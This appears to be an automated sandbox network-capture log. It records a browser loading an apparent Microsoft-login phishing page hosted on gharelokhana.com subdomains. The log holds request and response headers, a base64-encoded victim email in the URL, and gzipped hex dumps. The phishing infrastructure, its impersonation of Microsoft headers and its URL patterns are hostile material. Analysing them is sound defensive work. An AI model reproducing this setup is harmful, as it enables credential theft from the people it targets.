                                                2024-12-05 07:24:09 UTC15639INData Raw: 1f 8b 08 00 00 00 00 00 00 03 e4 bd 6d 5b e3 38 d2 30 fa fd fe 15 c1 bb 0f 1d 4f 4c c8 0b d0 e0 b4 3b 77 1a d2 dd cc 00 61 08 4c cf 2e b0 5c 4e ac 80 a7 83 9d b5 1d 68 06 72 7e fb a9 17 c9 96 1d 87 ee d9 3d d7 f9 f2 cc 0b b1 a5 92 2c 95 aa 4a 55 a5 92 b4 f9 d3 da ff 54 7e aa 6c fc f8 3f 95 e1 79 ef ec bc 32 f8 58 39 ff 7c 78 76 50 39 85 b7 7f 54 4e 06 e7 87 fb fd 1f af 07 3f 8a ff 9f df f9 71 65 e2 4f 45 05 7e 47 6e 2c bc 4a 18 54 c2 a8 e2 07 e3 30 9a 85 91 9b 88 b8 72 0f 7f 23 df 9d 56 26 51 78 5f 49 ee 44 65 16 85 7f 88 71 12 57 a6 7e 9c 40 a1 91 98 86 8f 95 2a 54 17 79 95 53 37 4a 9e 2a 87 a7 66 1d ea 17 50 9b 7f eb 07 50 7a 1c ce 9e e0 f9 2e a9 04 61 e2 8f 45 c5 0d 3c aa 6d 0a 2f 41 2c 2a f3 c0 13 51 e5 f1 ce 1f df 55 8e fd 71 14 c6 e1 24 a9 44 62 2c
                                                Data Ascii: m[80OL;waL.\Nhr~=,JUT~l?y2X9|xvP9TN?qeOE~Gn,JT0r#V&Qx_IDeqW~@*TyS7J*fPPz.aE<m/A,*QUq$Db,
                                                2024-12-05 07:24:09 UTC12530INData Raw: 36 c7 ed 3d 78 0b 56 4e e7 38 13 78 f6 0e 69 1c f8 80 67 fd 9e 89 07 a1 ce c1 58 b1 43 84 fa 9b d6 21 37 9c 70 20 33 ef 1c c1 a1 4d 5f 7a 93 44 69 af b4 b9 0e 0f 4b 9a c3 b0 1c 89 5b 9c 5a b7 34 50 8e 20 7e 62 b4 7c 88 78 cb 56 8a 87 0f f9 ab 88 6c e3 6f 1f 7b 1f f7 3e ee 1a 79 a5 8a e7 2d ee e6 10 ca 4f a5 71 68 1b b1 f6 06 5c 00 55 fa 2a eb 3e 7b e1 79 3a c1 d3 a8 24 1d 80 48 57 61 38 a9 e6 a7 e6 65 18 05 f4 fb d2 3d bd 20 95 b4 2f 60 73 85 87 5c 6e ed 7f 18 9c 21 14 c7 6f 93 48 51 93 50 aa 1b 82 b2 c6 6d 96 c2 7d bb 91 c9 f4 ed 26 f9 71 e8 d4 18 ea 2c f0 46 e4 f2 8e 4d 4d 6c db 86 c8 5e d8 32 b2 e9 78 23 c3 22 c1 68 e0 65 4e c6 ca 13 66 83 6a 0b 2f a4 a3 c3 a8 2e 02 30 48 3c 18 91 fe 37 3c f6 03 60 07 60 1d ff c1 a4 9e 3b 60 54 5c 1a 74 bc 91 71 5d 2d
                                                Data Ascii: 6=xVN8xigXC!7p 3M_zDiK[Z4P ~b|xVlo{>y-Oqh\U*>{y:$HWa8e= /`s\n!oHQPm}&q,FMMl^2x#"heNfj/.0H<7<``;`T\tq]-
                                                2024-12-05 07:24:09 UTC16384INData Raw: 13 ee fb 0a 70 98 7f 0a 5d a7 9f 48 fe dc 20 88 bc 8d 43 da ce 9f e2 30 f6 63 04 2c 5c 5a 87 21 cb 5c 86 a4 64 96 32 86 d5 45 66 67 1f e2 84 57 d9 6f 75 c6 5d 49 6e 22 a0 c8 65 aa 22 fd 69 31 13 cd b7 ef d0 37 52 12 7f b4 a5 64 c2 3b 20 65 d7 73 e2 bc 7c e3 da 86 c4 a8 d3 22 da d9 0f a9 44 a1 56 7a ce 99 b2 85 28 27 00 e4 3b da 3f 9e 3a 62 c7 71 9d 31 2e c7 8e 87 1f 0f 8e c3 02 48 b5 11 89 ea 54 72 2d 8b d5 b9 e7 8c dd de 61 8e ef 4f 63 ce 60 e4 8d 9d 7b cd 70 9c fc cb bb 66 9c 82 e8 e4 5f 1b 5a a6 73 fa a4 e5 48 da e8 30 19 e3 7c b4 91 d4 e1 fa 43 29 ea a2 27 12 2e a2 88 28 fd 33 8f 44 a6 05 8e 31 13 b9 c7 73 0c 4c 51 56 b4 8d 0b e6 02 a9 79 6f 18 e1 98 3a d0 6b 6e 39 05 57 18 96 b6 f9 f0 a9 9b b4 85 0d 9a 3b 70 d6 70 79 51 54 53 1f 5a 0a 47 57 53 b3 cc
                                                Data Ascii: p]H C0c,\Z!\d2EfgWou]In"e"i17Rd; es|"DVz(';?:bq1.HTr-aOc`{pf_ZsH0|C)'.(3D1sLQVyo:kn9W;ppyQTSZGWS
                                                2024-12-05 07:24:09 UTC5382INData Raw: 58 88 d3 38 0e 43 3a 9d b2 52 12 56 9f 06 d4 92 37 6b 48 4c be b3 ef f8 3b 80 8d ab 8b f7 ef 0e 74 9c 83 a7 e0 f1 96 cd 0e 04 af 64 98 5b 12 d2 44 9d f7 ba 7c db a8 d5 a9 d6 93 32 65 5f 4d e3 ac 81 ad 8b 3b af 73 d8 be d6 25 e0 e1 45 63 74 12 cf 39 08 cb 61 99 8f 88 31 b4 4a 9c 13 e3 02 3a f2 36 a4 23 67 6d 19 fc a8 2a cf 4a 7d 22 fb 66 b4 66 98 b2 0b 26 e4 a9 da a2 a9 c5 74 5d c9 81 7b c1 91 07 02 50 68 9e 1d 5a b4 f6 82 da 5f ad 97 70 c4 a4 51 3f 24 49 1a 07 c2 d4 79 5f 81 9d ae 6a 27 74 de aa 2e 3f 73 7b bb a2 21 d9 ad b4 93 07 43 1f 70 d4 39 dc c2 35 5a cb b1 3d 75 5e 1f ca 63 05 11 29 42 b3 e6 00 e1 b6 dd bd 0e d8 16 35 bd 90 bf d1 d0 c3 b0 79 88 1a 9b cb 5b bb 02 2d 00 c8 85 f8 7a 35 9d 7a 66 9d da 7d 0a 05 cd e6 92 5d dc 8b 65 0a c3 90 fa 49 5c f2
                                                Data Ascii: X8C:RV7kHL;td[D|2e_M;s%Ect9a1J:6#gm*J}"ff&t]{PhZ_pQ?$Iy_j't.?s{!Cp95Z=u^c)B5y[-z5zf}]eI\


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                11192.168.2.549847164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:10 UTC680OUTGET /3c4125ca1ce249aea8b425e8555a32e2/ HTTP/1.1
                                                Host: djdjkdlellekkff.gharelokhana.com
                                                Connection: Upgrade
                                                Pragma: no-cache
                                                Cache-Control: no-cache
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Upgrade: websocket
                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                Sec-WebSocket-Version: 13
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                Sec-WebSocket-Key: nkKeI43bRauZvPLRMgt+4g==
                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                2024-12-05 07:24:11 UTC743INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:11 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                cache-control: private
                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                x-ms-request-id: 2222f100-abf2-4c30-8be6-4ac878fe6700
                                                x-ms-ests-server: 2.1.19492.3 - NEULR1 ProdSlices
                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://4b553e95-3c4125ca.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}
                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                x-ms-srs: 1.P
                                                referrer-policy: strict-origin-when-cross-origin
                                                access-control-allow-origin: *
                                                access-control-allow-headers: *
                                                2024-12-05 07:24:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                12192.168.2.549849164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:10 UTC1153OUTGET /?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=true HTTP/1.1
                                                Host: djdjkdlellekkff.gharelokhana.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-Dest: document
                                                Referer: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
                                                2024-12-05 07:24:12 UTC784INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:11 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Content-Length: 63479
                                                Connection: close
                                                cache-control: no-store, no-cache
                                                pragma: no-cache
                                                vary: Accept-Encoding
                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                x-ms-request-id: 48c8506e-fbd9-4ec1-ab0c-7ef5b57e4a01
                                                x-ms-ests-server: 2.1.19568.3 - WEULR1 ProdSlices
                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://4b553e95-3c4125ca.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}
                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                x-ms-srs: 1.P
                                                referrer-policy: strict-origin-when-cross-origin
                                                content-encoding: gzip
                                                access-control-allow-origin: *
                                                access-control-allow-headers: *
                                                2024-12-05 07:24:12 UTC15600INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ec bd d9 76 ea 58 b6 28 f8 1e 5f c1 a6 f2 18 38 06 4c df d8 41 fa 60 c0 18 9b ce 34 c6 4d 7a 78 08 69 01 32 20 61 49 80 f1 de e6 ad be a4 1e 6a dc 87 7a ab 3f c8 1f ab 39 e7 5a 6a c0 f6 8e c8 c8 3c f7 d4 b9 37 62 64 6e 4b 4b ab 99 6b 76 6b 76 12 bf 7e 2b b7 4a bd bb 76 c5 37 b1 e6 b3 bf fe f2 2b fe f1 c9 33 c9 34 0b 7e bf 4f 51 8d 82 7f 66 19 7e df 4c d2 c6 05 3f d3 fc 7f fd c5 f7 eb 84 49 0a fc f5 fd 6a a9 d6 8c e1 95 af ab 8e 35 9f aa f9 2c dd b7 d1 97 86 4f 92 65 7d a9 59 d8 e9 c8 e9 f5 eb 9c 59 92 4f d6 35 8b 69 56 c1 6f b1 57 eb 08 17 3c f1 c9 13 c9 30 99 55 58 5a a3 48 ce 0f c0 58 8b 08 7b 59 aa ab 82 bf c4 bb 47 7a 9b 05 f3 1f 7d 32 4d ad 52 60 ca 98 ed 8e ba 8d f4 8b 91 92 3e 5f 48 96 3a 9c 7d 3e 70 ad 2a d6 a4 a0 b0
                                                Data Ascii: vX(_8LA`4Mzxi2 aIjz?9Zj<7bdnKKkvkv~+Jv7+34~OQf~L?Ij5,Oe}YYO5iVoW<0UXZHX{YGz}2MR`>_H:}>p*
                                                2024-12-05 07:24:12 UTC12556INData Raw: c7 9d c7 87 58 17 ee 5c bb 8c a5 40 4b 5a 1e 86 c2 c4 25 84 b7 64 1e ee fa 05 cc a8 91 19 75 c2 a4 07 1a 19 1f 25 00 7f ee 92 53 b1 58 13 26 a6 a5 9a 38 3e c5 49 62 5f 8b a5 36 6e 7c f3 81 9e e5 92 a1 c7 5f a1 cb a9 3e 0f ea 52 e8 58 ef e0 14 fa 3a c8 36 a1 90 c0 85 7e 1f c4 37 0c 36 61 fd 12 f0 c0 5f a4 22 2e 02 1d 58 09 ea 2f a1 43 be 8c 24 a3 1c 12 55 89 22 08 9a 3d 07 9b 7a 06 b2 7e 90 95 f1 29 1f 18 1f c6 49 80 f9 58 60 db c2 f7 00 d9 a5 81 63 fd 0a 5a 41 a4 f3 a9 cc 97 48 be e6 52 6d a3 31 09 ba f2 b7 d0 78 fd 13 34 d6 0a d5 eb 93 df 0d 7f 0d 66 62 79 04 9f e0 1c c5 e4 2f e1 ac bb aa a2 38 57 9a 1d 52 15 75 92 d8 d8 1e 2b 24 14 be 07 ee c7 7c 84 bf fe 13 f8 1b 30 e9 6f c3 5f 6d e0 32 59 38 04 ec 9d 50 43 66 c4 b7 c2 ab dc 3a 91 88 93 42 62 83 c2 be
                                                Data Ascii: X\@KZ%du%SX&8>Ib_6n|_>RX:6~76a_".X/C$U"=z~)IX`cZAHRm1x4fby/8WRu+$|0o_m2Y8PCf:Bb
                                                2024-12-05 07:24:12 UTC16384INData Raw: 7d f0 f1 e8 ec f4 cf d7 9f 5e 9f 7e 54 85 c7 c5 e0 b2 f5 ea e0 b8 79 79 79 74 1a ab 82 23 d1 16 aa d5 b8 76 e5 3f e5 40 53 ad f0 21 9d e5 53 41 6c d9 ac 72 a8 ad 3f fa ad a3 ff 12 8e fa 00 16 8c f8 ba 5b c9 80 50 f0 09 94 c7 89 92 cf 1c 26 e1 21 87 4c 58 b8 9d 65 4f 35 6d 13 97 0b ea 15 f2 2d 2c 0d 76 31 ad cd 5b 9b 76 7b 5f 33 eb 9a be dd 6a fe 9e 8f 11 0f 69 13 86 44 b2 e6 53 6b ec 84 b6 6f 10 e1 d2 b9 6a a1 db ef 92 5d 98 40 e1 96 2e 20 dc 13 4f c0 2e 29 c4 44 f3 91 9e 15 d2 0b b2 5e 36 d2 af 2b 30 9f 4f 91 8f 43 8b 5c 7f 25 62 7c d2 8a fa 7f 21 a5 a1 15 53 45 2f d2 6d d2 29 d0 8f 9a 13 4f a5 ce e0 34 95 ec 77 69 42 6e cc 61 bd 90 8e 78 06 05 4c f9 8f 62 3a 90 29 15 30 e5 72 31 bd a7 4f 08 57 52 0d 99 51 5b af 67 38 cf 04 2c 80 d0 e9 0f 08 cc 36 a3 0f
                                                Data Ascii: }^~Tyyyt#v?@S!SAlr?[P&!LXeO5m-,v1[v{_3jiDSkoj]@. O.)D^6+0OC\%b|!SE/m)O4wiBnaxLb:)0r1OWRQ[g8,6
                                                2024-12-05 07:24:12 UTC16384INData Raw: bc 6c e6 d0 d6 df e2 9b fd 16 59 05 4d ce 27 f9 a6 d7 eb af 3f c9 37 43 fb c9 97 ce 57 e6 b4 1a 49 ab 4e 68 bf a0 5b 8a fe dc 2a fa f3 44 26 62 02 20 cc 7e 82 77 d6 0c 57 a0 b3 ea 1d b6 77 9f 22 24 0e 15 ad 0b a5 a4 26 b1 95 b9 ce a5 4a 94 ca 21 6f 37 ab 7e 86 ae d9 7e cc c9 99 bc ac 32 03 86 91 51 fd fd 8e 28 45 ef a3 71 50 5a ee bd 43 86 13 4c 9f 24 04 9f 29 c6 e5 5f 50 0c ae 30 e8 8a b2 44 0a 2a 5b d0 9e 4c 4d 41 6d a8 a9 87 3c 31 24 2d 6e e7 da 3e 81 78 0d a6 bc 8a 0e fd 39 52 6c d2 74 f4 90 90 69 b8 0d e4 65 d0 23 35 50 19 7c d1 ef 1c e9 50 f0 9b 12 a4 14 58 79 14 66 06 94 57 69 1a 66 49 9a 51 29 f9 eb f3 66 bd 8a 66 fc 2a 1a df 64 4e e7 b1 f1 ec d4 87 f3 2b fd de fa 70 ce 7d 49 f0 5e 52 9b 66 0d b6 2b f9 8d b7 d8 a7 2d 45 00 17 52 a4 03 2d 36 70 96
                                                Data Ascii: lYM'?7CWINh[*D&b ~wWw"$&J!o7~~2Q(EqPZCL$)_P0D*[LMAm<1$-n>x9Rltie#5P|PXyfWifIQ)ff*dN+p}I^Rf+-ER-6p
                                                2024-12-05 07:24:12 UTC2555INData Raw: b0 63 a8 0e 4e e5 dc 4e b3 64 98 37 5f 4e 31 61 b9 2e ed 12 ff 89 1b 04 3c 35 a9 c8 3d bd 3c 86 07 b0 40 5e ce 8b f8 27 68 25 f0 fe 7d 94 50 76 e6 74 a4 90 a6 66 8d 98 b0 d1 94 ce 50 5a c2 a3 44 6c 2c f4 04 97 8e 7a 1a 5f 1a 9e 94 2d 5c b1 71 10 8f ea 04 d3 ea 41 97 44 c3 6a 58 05 a9 f3 0e ec 77 18 b9 ac 20 61 93 76 7b 49 53 b4 68 41 3f 58 0b 2d c8 9e 06 0a e9 63 76 55 bd f4 2c 43 89 82 14 fb b1 60 bc 43 1d 47 41 b6 a0 53 4f a4 87 e6 42 99 bc d9 48 36 a5 0f 7d aa 29 7d 42 54 33 42 a7 e1 34 cd 02 20 f4 7a 5e 66 26 96 50 93 f3 15 88 d4 cc 30 a7 f5 38 de 12 45 8b 99 5e f8 cc 5d 02 3d 12 3b 0e 1a 4d 14 7b f6 ca ad 11 9d 79 65 f2 e5 39 f6 0e cf 70 e6 65 0d 43 2b ba 99 5a b4 48 0d c5 5d b9 2a 53 03 d2 f3 2c c3 f4 fd 02 91 e2 48 a8 e6 9c 73 e9 26 6d 1e a9 e3 16
                                                Data Ascii: cNNd7_N1a.<5=<@^'h%}PvtfPZDl,z_-\qADjXw av{IShA?X-cvU,C`CGASOBH6})}BT3B4 z^f&P08E^]=;M{ye9peC+ZH]*S,Hs&m


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                13192.168.2.549848164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:10 UTC912OUTGET /favicon.ico HTTP/1.1
                                                Host: djdjkdlellekkff.gharelokhana.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
                                                2024-12-05 07:24:11 UTC743INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:11 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                cache-control: private
                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                x-ms-request-id: 3344aa90-3048-426d-b50a-4a36a6861400
                                                x-ms-ests-server: 2.1.19492.3 - NEULR1 ProdSlices
                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://4b553e95-3c4125ca.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}
                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                x-ms-srs: 1.P
                                                referrer-policy: strict-origin-when-cross-origin
                                                access-control-allow-origin: *
                                                access-control-allow-headers: *
                                                2024-12-05 07:24:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                14192.168.2.549851164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:10 UTC544OUTGET /shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js HTTP/1.1
                                                Host: 707242bf-3c4125ca.gharelokhana.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                2024-12-05 07:24:11 UTC745INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:11 GMT
                                                Content-Type: application/x-javascript
                                                Content-Length: 49935
                                                Connection: close
                                                accept-ranges: bytes
                                                access-control-allow-origin: *
                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                age: 5462838
                                                cache-control: public, max-age=31536000
                                                etag: 0x8DCE31CBE97473C
                                                last-modified: Wed, 02 Oct 2024 19:59:37 GMT
                                                vary: Accept-Encoding
                                                x-cache: HIT
                                                x-ms-blob-type: BlockBlob
                                                x-ms-lease-status: unlocked
                                                x-ms-request-id: 9ba7681e-c01e-00c4-7737-1521f7000000
                                                x-ms-version: 2009-09-19
                                                content-encoding: gzip
                                                2024-12-05 07:24:11 UTC6449INData Raw: 1f 8b 08 00 00 00 00 00 00 03 e4 bd 6d 5b e3 38 d2 30 fa fd fe 15 c1 bb 0f 1d 4f 4c c8 0b d0 e0 b4 3b 77 1a d2 dd cc 00 61 08 4c cf 2e b0 5c 4e ac 80 a7 83 9d b5 1d 68 06 72 7e fb a9 17 c9 96 1d 87 ee d9 3d d7 f9 f2 cc 0b b1 a5 92 2c 95 aa 4a 55 a5 92 b4 f9 d3 da ff 54 7e aa 6c fc f8 3f 95 e1 79 ef ec bc 32 f8 58 39 ff 7c 78 76 50 39 85 b7 7f 54 4e 06 e7 87 fb fd 1f af 07 3f 8a ff 9f df f9 71 65 e2 4f 45 05 7e 47 6e 2c bc 4a 18 54 c2 a8 e2 07 e3 30 9a 85 91 9b 88 b8 72 0f 7f 23 df 9d 56 26 51 78 5f 49 ee 44 65 16 85 7f 88 71 12 57 a6 7e 9c 40 a1 91 98 86 8f 95 2a 54 17 79 95 53 37 4a 9e 2a 87 a7 66 1d ea 17 50 9b 7f eb 07 50 7a 1c ce 9e e0 f9 2e a9 04 61 e2 8f 45 c5 0d 3c aa 6d 0a 2f 41 2c 2a f3 c0 13 51 e5 f1 ce 1f df 55 8e fd 71 14 c6 e1 24 a9 44 62 2c
                                                Data Ascii: m[80OL;waL.\Nhr~=,JUT~l?y2X9|xvP9TN?qeOE~Gn,JT0r#V&Qx_IDeqW~@*TyS7J*fPPz.aE<m/A,*QUq$Db,
                                                2024-12-05 07:24:12 UTC16384INData Raw: 9d ae ba ff e5 ca 72 7a 3f d5 b7 b0 5c 8f 9d 18 47 78 40 46 90 0b 16 52 02 05 24 7f 01 a8 bb 9c 54 65 60 c0 8a 9b 80 b5 7f 47 99 b8 9c a7 bd 56 0d 90 f6 35 14 5c 0b b9 e0 fc fd 4f 97 c0 75 4b 53 b3 06 c0 cc a2 37 40 7b d5 1b 80 dc 8f 69 e7 bc bf a1 cc ba c4 f0 3c ca 4d 1f a0 f6 38 1a 4b a9 d1 d5 5f c8 0d c7 be b8 85 f5 0d 54 34 a2 5e 15 3d 48 9e bb b2 38 2c e9 96 b2 22 fa e9 64 91 3c a1 ee 05 ee 1a c4 f5 59 c2 df 60 6e a5 89 c6 87 a9 8b 82 d7 80 09 fd 77 a1 d9 ad 52 94 9e 16 94 e1 e3 ae fc 71 5d 8b 0d cc 39 8e fd 5a 13 24 cf 3a 08 0d c7 30 4d 9e bd c2 f5 75 aa d3 5f ae 2d 34 ad e0 95 da c2 55 b5 c9 a6 fe f5 ea b0 fd aa c2 bf d0 11 39 71 3c 73 84 53 2f f0 4e dd e4 ce 4e 2c da c3 66 07 d6 24 72 6f 69 d8 a2 c5 52 b0 6c 16 24 97 2b 8d c1 af 59 dc 0b 55 84 3d
                                                Data Ascii: rz?\Gx@FR$Te`GV5\OuKS7@{i<M8K_T4^=H8,"d<Y`nwRq]9Z$:0Mu_-4U9q<sS/NN,f$roiRl$+YU=
                                                2024-12-05 07:24:12 UTC16384INData Raw: 8d 1c c3 9d 3e ba 4f 31 8e 62 17 89 12 74 10 f6 90 ef 3b cf 69 c8 94 dd b4 46 61 88 d6 28 3c 31 c9 c0 03 ab 83 76 93 f6 35 56 0d 85 78 e2 ac 73 e2 2c 7f bc b4 1d 91 d6 7f 3d d7 91 1b 31 a7 63 d0 1f 79 1b e6 d8 09 f8 e9 90 48 8c 1e 27 23 de e3 f9 f3 88 85 d6 b0 7e c4 01 a5 86 c7 fe 07 83 e1 62 73 39 0b 69 10 67 de c3 98 d7 32 3c 09 3b 25 63 c0 1f eb be ff 9c 68 e5 36 a8 8d a4 93 11 2b 42 e8 db a8 ca c6 a8 c6 99 59 83 1b aa 17 55 99 08 7d 4c 7b 28 fb a7 ba a2 ba 26 45 5b a1 31 d3 9c 9b 5b 95 11 7a 80 65 0e 37 31 9f c9 84 cf 26 d5 76 ae f7 86 7c 92 dc 70 ab 6f 5a fd fa bf f9 45 ae 83 f4 9d e7 7f e7 85 b8 a8 5f 38 cf 72 ff db e5 f5 02 a3 6e c6 4e 73 61 c5 8a f8 56 04 c3 d2 0a 0d ed 8f 57 7b 82 65 34 29 ce c3 d8 c5 6a 64 25 5d 21 1b 6b da f9 30 51 e9 69 8c ea
                                                Data Ascii: >O1bt;iFa(<1v5Vxs,=1cyH'#~bs9ig2<;%ch6+BYU}L{(&E[1[ze71&v|poZE_8rnNsaVW{e4)jd%]!k0Qi
                                                2024-12-05 07:24:12 UTC10718INData Raw: fc 95 2a e6 b8 b7 d0 e9 39 51 40 95 c7 a8 a7 69 b6 5c 0e 55 c3 19 b3 45 84 5c d8 91 7b ea fd 53 8d 63 dd 61 90 98 3f 53 e8 46 7d bc 77 0d 6b 94 41 52 00 35 6b c8 bc 91 52 21 02 97 51 11 ed 4d 18 71 ba 7c 94 4b 1a de f4 a8 38 f6 26 e3 71 21 89 fc 60 1a a8 48 88 cd 8e e9 5e 06 98 45 6d 74 8d 48 a4 11 bd fd 75 1c e0 50 4a a2 4a 30 5f 88 c3 96 eb 58 5d d7 0a b0 82 16 ca 3e 16 0d 2a 65 5e 7e 53 8e 91 b4 48 5c 35 66 b7 db 30 cc 8e 15 f1 87 81 a0 d8 a3 fe 82 08 65 a2 7e c6 9f 89 97 a0 3d b1 32 d1 3e 74 1e eb 3e fb a7 d1 d9 ee ea e6 66 df bf 88 56 e3 b3 f1 fe 44 f7 30 7b 14 ad d8 ec 81 1b eb a8 f2 17 22 d4 02 48 18 e0 1c 4b f7 cc cf c6 a7 e0 03 13 77 cf cf 76 f7 bd 49 fc 28 9a 4f 62 7a a7 42 72 cf 78 9a 91 c4 48 0f 8e a1 c5 3a 8a e9 c7 74 cd 7f c2 a5 4b 3f 48 aa
                                                Data Ascii: *9Q@i\UE\{Sca?SF}wkAR5kR!QMq|K8&q!`H^EmtHuPJJ0_X]>*e^~SH\5f0e~=2>t>fVD0{"HKwvI(ObzBrxH:tK?H


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                15192.168.2.549858164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:13 UTC445OUTOPTIONS /api/report?catId=GW+estsfd+SEC HTTP/1.1
                                                Host: 4b553e95-3c4125ca.gharelokhana.com
                                                Connection: keep-alive
                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                Access-Control-Request-Method: POST
                                                Access-Control-Request-Headers: content-type
